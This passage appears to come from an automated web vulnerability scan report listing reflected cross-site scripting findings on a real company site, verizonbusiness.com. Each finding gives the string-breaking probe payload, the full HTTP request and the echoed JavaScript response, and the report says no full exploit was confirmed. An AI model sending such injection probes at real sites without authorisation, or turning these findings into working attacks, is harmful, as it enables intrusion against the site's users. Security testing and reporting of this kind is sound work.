This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/companya39dc'%3b3e6cb8d10dd/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:53:05 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 47089
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:53:05 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:53:05 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/about/companya39dc';3e6cb8d10dd/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.325. http://www.verizonbusiness.com/about/company/executives/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/company/executives/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ecd29"%3bb46d3377feb was submitted in the REST URL parameter 1. This input was echoed as ecd29";b46d3377feb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aboutecd29"%3bb46d3377feb/company/executives/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:52:52 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40648
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:52:52 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:52:52 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/aboutecd29";b46d3377feb/company/executives/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEM
...[SNIP]...

1.326. http://www.verizonbusiness.com/about/company/executives/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/company/executives/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d9599'%3bd6062a784b3 was submitted in the REST URL parameter 1. This input was echoed as d9599';d6062a784b3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aboutd9599'%3bd6062a784b3/company/executives/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:52:59 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40648
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:52:59 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:52:59 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/aboutd9599';d6062a784b3/company/executives/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.327. http://www.verizonbusiness.com/about/company/executives/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/company/executives/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2444"%3bde883586035 was submitted in the REST URL parameter 2. This input was echoed as d2444";de883586035 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/companyd2444"%3bde883586035/executives/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:53:06 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 47109
Date: Wed, 17 Nov 2010 00:53:06 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:53:06 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/companyd2444";de883586035/executives/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR
...[SNIP]...

1.328. http://www.verizonbusiness.com/about/company/executives/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/company/executives/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1985'%3b9312e0d3d10 was submitted in the REST URL parameter 2. This input was echoed as f1985';9312e0d3d10 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/companyf1985'%3b9312e0d3d10/executives/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:53:14 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html; charset=UTF-8
Content-Length: 47109
Date: Wed, 17 Nov 2010 00:53:14 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:53:14 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/about/companyf1985';9312e0d3d10/executives/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.329. http://www.verizonbusiness.com/about/company/executives/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/company/executives/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff6b5'%3be83a61c1377 was submitted in the REST URL parameter 3. This input was echoed as ff6b5';e83a61c1377 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/company/executivesff6b5'%3be83a61c1377/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:53:48 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 46856
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:53:48 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:53:48 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/about/company/executivesff6b5';e83a61c1377/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.330. http://www.verizonbusiness.com/about/company/executives/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/company/executives/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2049e"%3b55b4960a097 was submitted in the REST URL parameter 3. This input was echoed as 2049e";55b4960a097 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/company/executives2049e"%3b55b4960a097/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:53:35 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 46854
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:53:35 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:53:35 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/company/executives2049e";55b4960a097/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.331. http://www.verizonbusiness.com/about/environment/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/environment/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 46859'%3b5c3715eb664 was submitted in the REST URL parameter 1. This input was echoed as 46859';5c3715eb664 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about46859'%3b5c3715eb664/environment/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:53:32 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40634
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:53:32 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:53:32 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/about46859';5c3715eb664/environment/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.332. http://www.verizonbusiness.com/about/environment/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/environment/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36986"%3b97e2b653e25 was submitted in the REST URL parameter 1. This input was echoed as 36986";97e2b653e25 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about36986"%3b97e2b653e25/environment/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:53:13 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40634
Date: Wed, 17 Nov 2010 00:53:13 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:53:13 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about36986";97e2b653e25/environment/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR
...[SNIP]...

1.333. http://www.verizonbusiness.com/about/environment/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/environment/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 24f28'%3b7546863c3d was submitted in the REST URL parameter 2. This input was echoed as 24f28';7546863c3d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/environment24f28'%3b7546863c3d/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:54:20 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 47093
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:54:20 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:54:20 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/about/environment24f28';7546863c3d/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.334. http://www.verizonbusiness.com/about/environment/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/environment/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f99a6"%3bae96979876c was submitted in the REST URL parameter 2. This input was echoed as f99a6";ae96979876c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/environmentf99a6"%3bae96979876c/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:53:50 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 47095
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:53:50 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:53:50 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/environmentf99a6";ae96979876c/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.335. http://www.verizonbusiness.com/about/events/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/events/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a7ac7'%3bcea4aeeff4f was submitted in the REST URL parameter 1. This input was echoed as a7ac7';cea4aeeff4f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /abouta7ac7'%3bcea4aeeff4f/events/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:53:43 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40626
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:53:43 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:53:43 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/abouta7ac7';cea4aeeff4f/events/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.336. http://www.verizonbusiness.com/about/events/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/events/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95af7"%3be7f92cd1962 was submitted in the REST URL parameter 1. This input was echoed as 95af7";e7f92cd1962 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about95af7"%3be7f92cd1962/events/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:53:32 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40624
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:53:32 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:53:32 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about95af7";e7f92cd1962/events/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBM
...[SNIP]...

1.337. http://www.verizonbusiness.com/about/events/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/events/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f93c"%3b9bd47f3437f was submitted in the REST URL parameter 2. This input was echoed as 7f93c";9bd47f3437f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

